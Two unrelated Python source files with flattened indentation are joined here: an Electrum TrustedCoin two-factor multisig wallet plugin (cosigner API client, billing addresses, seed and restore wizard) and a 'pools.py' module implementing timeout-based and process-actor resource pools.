from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, UserFacingException
from electrum.storage import STO_EV_USER_PW
from electrum.network import Network
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
_, depth, fingerprint, child_number, c, cK = bip32.deserialize_xpub(xpub)
xpub = bip32.serialize_xpub(xtype, c, cK, depth, fingerprint, child_number)
return xpub
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
    def send_request(self, method, relative_url, data=None, headers=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
        headers = dict(headers) if headers else {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
return Network.send_http_on_proxy(method, url, params=data, headers=headers, on_finish=self.handle_response)
elif method == 'post':
return Network.send_http_on_proxy(method, url, json=data, headers=headers, on_finish=self.handle_response)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
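    # Illustration only: the endpoint helpers below all reduce to calls of the form
    #   self.send_request('get',  'cosigner/<short_id>')                                # billing info
    #   self.send_request('post', 'cosigner/<short_id>/sign', {'otp': ..., 'transaction': ...})
    # where <short_id> is the short user id derived from the wallet's two xpubs.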
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
        Ask the server to cosign a transaction on behalf of a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.KOINON_ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.print_error("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bip32._CKD_pub(cK, c, s)
return serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = CKD_pub(cK, c, num)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(cK)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(cK)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.print_error("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa'):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(repr(e)))
return
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise BaseException('unexpected seed type: {}'.format(seed_type))
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
xprv, xpub = bip32_root(bip32_seed, xtype)
xprv, xpub = bip32_private_derivation(xprv, "m/", derivation)
return xprv, xpub
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise BaseException('unexpected seed type: {}'.format(t))
words = seed.split()
n = len(words)
# old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.storage.set_keystore_encryption(bool(password))
if encrypt_storage:
wizard.storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.storage.put('x1/', k1.dump())
wizard.storage.put('x2/', k2.dump())
wizard.storage.write()
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard, seed, passphrase):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
storage = wizard.storage
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
storage.put('x1/', k1.dump())
storage.put('x2/', k2.dump())
long_user_id, short_id = get_user_id(storage)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
storage.put('x3/', k3.dump())
storage.set_keystore_encryption(bool(password))
if encrypt_storage:
storage.set_password(password, enc_version=STO_EV_USER_PW)
wizard.wallet = Wallet_2fa(storage)
wizard.create_addresses()
def create_remote_key(self, email, wizard):
xpub1 = wizard.storage.get('x1/')['xpub']
xpub2 = wizard.storage.get('x2/')['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.storage)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.storage.put('x3/', k3.dump())
wizard.storage.put('use_trustedcoin', True)
wizard.storage.write()
wizard.wallet = Wallet_2fa(wizard.storage)
wizard.run('create_addresses')
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.storage.get('x1/')['xpub'] != xpub1 or
wizard.storage.get('x2/')['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
_, _, _, _, c, k = deserialize_xprv(xprv)
pk = bip32_private_key([0, 0], k, c)
key = ecc.ECPrivkey(pk)
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
pools.py
|
"""Resource pools."""
__all__ = [
'ProcessActorPool',
'TimeoutPool',
]
import array
import collections
import contextlib
import dataclasses
import functools
import heapq
import inspect
import itertools
import logging
import multiprocessing
import multiprocessing.connection
import multiprocessing.reduction
import os
import socket
import threading
import time
import types
import weakref
from typing import Any, Dict, Tuple
from . import collections as g1_collections # pylint: disable=reimported
from .assertions import ASSERT
LOG = logging.getLogger(__name__)
class TimeoutPool:
"""Rudimentary timeout-based resource pool.
A pool that releases resources left unused longer than a timeout.
NOTE: This class is not thread-safe.
"""
@dataclasses.dataclass(frozen=True)
class Stats:
num_allocations: int
num_concurrent_resources: int
max_concurrent_resources: int
def __init__(
self,
pool_size,
allocate,
release,
timeout=300, # 5 minutes.
):
# Store pairs of (resource, returned_at), sorted by returned_at
# in ascending order.
self._pool = collections.deque()
self._pool_size = pool_size
self._allocate = allocate
self._release = release
self._timeout = timeout
self._num_allocations = 0
self._num_concurrent_resources = 0
self._max_concurrent_resources = 0
def get_stats(self):
return self.Stats(
num_allocations=self._num_allocations,
num_concurrent_resources=self._num_concurrent_resources,
max_concurrent_resources=self._max_concurrent_resources,
)
def __enter__(self):
return self
def __exit__(self, *_):
self.close()
@contextlib.contextmanager
def using(self):
resource = self.get()
try:
yield resource
finally:
self.return_(resource)
def get(self):
"""Get a resource from the pool or allocate new one when empty.
This does not block nor raise when the pool is empty (if we want
to implement rate limit, we could do that?).
"""
to_allocate = not self._pool
if to_allocate:
resource = self._allocate()
self._num_allocations += 1
self._num_concurrent_resources += 1
max_concurrent_resources = max(
self._num_concurrent_resources, self._max_concurrent_resources
)
else:
# Return the most recently released resource so that the
# less recently released resources may grow older and
# eventually be released.
resource = self._pool.pop()[0]
max_concurrent_resources = self._max_concurrent_resources
try:
self.cleanup()
except Exception:
if to_allocate:
self._num_allocations -= 1
self._num_concurrent_resources -= 1
self._release(resource)
raise
self._max_concurrent_resources = max_concurrent_resources
return resource
def return_(self, resource):
"""Return the resource to the pool.
The pool will release resources that exceed the timeout, or
when the pool is full.
"""
now = time.monotonic()
self._pool.append((resource, now))
self._cleanup(now)
def cleanup(self):
"""Release resources that exceed the timeout.
You may call this periodically to release old resources so that
the pool is not always at its high-water mark. Note that
get/return_ call this for you, so if the program uses the pool
frequently, you do not need to call cleanup periodically.
"""
self._cleanup(time.monotonic())
def _cleanup(self, now):
deadline = now - self._timeout
while self._pool:
if (
len(self._pool) > self._pool_size
or self._pool[0][1] < deadline
):
self._release_least_recently_released_resource()
else:
break
def close(self):
"""Release all resources in the pool."""
while self._pool:
self._release_least_recently_released_resource()
def _release_least_recently_released_resource(self):
self._num_concurrent_resources -= 1
self._release(self._pool.popleft()[0])
class ProcessActorPool:
"""Process-actor pool.
stdlib's multiprocessing.pool.Pool is modeled after the executor
where workers are stateless. ProcessActorPool manages a pool of
stateful process-actors.
If an actor is not returned to the pool and is garbage collected,
the associated process and other resources will be automatically
returned to the pool or released.
NOTE: This class is not thread-safe.
"""
@dataclasses.dataclass(frozen=True)
class Stats:
num_spawns: int
num_concurrent_processes: int
max_concurrent_processes: int
current_highest_uses: int
_COUNTER = itertools.count(1).__next__
@dataclasses.dataclass(order=True)
class _Entry:
process: multiprocessing.Process = dataclasses.field(compare=False)
conn: multiprocessing.connection.Connection = \
dataclasses.field(compare=False)
negative_num_uses: int
def __init__(self, pool_size, max_uses_per_actor=None, context=None):
# Store processes, sorted by num_uses in descending order.
self._pool = []
self._pool_size = pool_size
# Store id(stub) -> entry. We store id(stub) to avoid creating
# a strong reference to the stub.
self._stub_ids_in_use = {}
self._max_uses_per_actor = max_uses_per_actor
self._context = context or multiprocessing.get_context()
self._num_spawns = 0
self._num_concurrent_processes = 0
self._max_concurrent_processes = 0
def get_stats(self):
if self._pool:
current_highest_uses = -self._pool[0].negative_num_uses
else:
current_highest_uses = 0
for entry in self._stub_ids_in_use.values():
num_uses = -entry.negative_num_uses
if num_uses > current_highest_uses:
current_highest_uses = num_uses
return self.Stats(
num_spawns=self._num_spawns,
num_concurrent_processes=self._num_concurrent_processes,
max_concurrent_processes=self._max_concurrent_processes,
current_highest_uses=current_highest_uses,
)
def __enter__(self):
return self
def __exit__(self, exc_type, *_):
self.close(graceful=not exc_type)
@contextlib.contextmanager
def using(self, referent):
stub = self.get(referent)
try:
yield stub
finally:
self.return_(stub)
def get(self, referent):
"""Get a stub from the pool or allocate new one when empty.
This does not block nor raise when the pool is empty (if we want
to implement rate limit, we could do that?).
"""
to_spawn = not self._pool
if to_spawn:
entry = self._spawn()
self._num_spawns += 1
self._num_concurrent_processes += 1
max_concurrent_processes = max(
self._num_concurrent_processes, self._max_concurrent_processes
)
else:
# Return the most often used process so that it will be
# released sooner (when max_uses_per_actor is set).
entry = heapq.heappop(self._pool)
max_concurrent_processes = self._max_concurrent_processes
try:
stub = _Stub(type(referent), entry.process, entry.conn)
stub_id = id(stub)
# Although this stub_id can be the same as another already
# collected stub's id (since id is just object's address),
# it is very unlikely that this id conflict will happen when
# the entry is still in the self._stub_ids_in_use dict as it
# requires all these to happen:
#
# * The old stub is collected.
# * The old stub's finalizer has not been called yet (is
# this even possible?).
# * The new stub is allocated, at the same address.
#
# But there is no harm in asserting that this will never happen.
ASSERT.setitem(self._stub_ids_in_use, stub_id, entry)
_BoundMethod('_adopt', entry.conn)(referent)
self._cleanup()
except Exception:
if to_spawn:
self._num_spawns -= 1
# self._num_concurrent_processes is decreased in
# self._release.
self._stub_ids_in_use.pop(stub_id)
self._release(entry)
raise
# TODO: self._return_id is non-reentrant, and thus is not safe
# in a finalize callback. How do we fix this?
weakref.finalize(stub, self._return_id, stub_id)
entry.negative_num_uses -= 1
self._max_concurrent_processes = max_concurrent_processes
return stub
def return_(self, stub):
"""Return the stub to the pool.
The pool will release actors that exceed ``max_uses_per_actor``,
or when the pool is full.
"""
return self._return_id(id(stub))
def _return_id(self, stub_id):
entry = self._stub_ids_in_use.pop(stub_id, None)
if entry is None:
return
try:
_BoundMethod('_disadopt', entry.conn)()
except Exception:
self._release(entry)
raise
heapq.heappush(self._pool, entry)
self._cleanup()
def _spawn(self):
conn, conn_actor = self._context.Pipe()
try:
name = 'pactor-%02d' % self._COUNTER()
entry = self._Entry(
process=self._context.Process(
name=name,
target=_ProcessActor(name, conn_actor),
),
conn=conn,
negative_num_uses=0,
)
entry.process.start()
# Block until process actor has received conn_actor; then we
# may close conn_actor.
_BoundMethod('_adopt', conn)(None)
except Exception:
conn.close()
raise
finally:
conn_actor.close()
return entry
def _release(self, entry):
self._num_concurrent_processes -= 1
try:
_conn_send(entry.conn, None)
entry.process.join(timeout=1)
if entry.process.exitcode is None:
LOG.warning(
'process actor does not quit: pid=%d', entry.process.pid
)
entry.process.kill()
entry.process.join(timeout=1)
if entry.process.exitcode is None:
raise RuntimeError(
'process actor cannot be killed: pid=%d' %
entry.process.pid
)
if entry.process.exitcode != 0:
# Sadly SIGTERM also causes exitcode != 0.
LOG.warning(
'process actor err out: pid=%d exitcode=%d',
entry.process.pid,
entry.process.exitcode,
)
# A process can only be closed after it exits.
entry.process.close()
finally:
entry.conn.close()
def _cleanup(self):
while self._pool:
if (
len(self._pool) > self._pool_size or (
self._max_uses_per_actor is not None and
-self._pool[0].negative_num_uses > self._max_uses_per_actor
)
):
self._release(heapq.heappop(self._pool))
else:
break
# Check crashed actors.
i = 0
last = len(self._pool) - 1
while i <= last:
if self._pool[i].process.exitcode is not None:
self._pool[i], self._pool[last] = \
self._pool[last], self._pool[i]
last -= 1
else:
i += 1
if last < len(self._pool) - 1:
to_release = self._pool[last:]
del self._pool[last:]
heapq.heapify(self._pool)
for entry in to_release:
try:
self._release(entry)
except Exception as exc:
LOG.error('cleanup: unable to release process: %r', exc)
def close(self, graceful=True):
entries = list(self._pool)
self._pool.clear()
if graceful:
for entry in entries:
try:
self._release(entry)
except Exception as exc:
LOG.error('close: unable to release process: %r', exc)
ASSERT.empty(self._stub_ids_in_use)
else:
entries.extend(self._stub_ids_in_use.values())
self._stub_ids_in_use.clear()
self._num_concurrent_processes -= len(entries)
for entry in entries:
entry.process.kill()
for entry in entries:
entry.process.join(timeout=1)
if entry.process.exitcode is None:
LOG.error(
'close: process actor cannot be killed: pid=%d',
entry.process.pid
)
else:
# A process can only be closed after it exits.
entry.process.close()
entry.conn.close()
@dataclasses.dataclass(frozen=True)
class _Call:
method: str
args: Tuple[Any, ...]
kwargs: Dict[str, Any]
# It seems like you cannot call sendmsg with empty buffers.
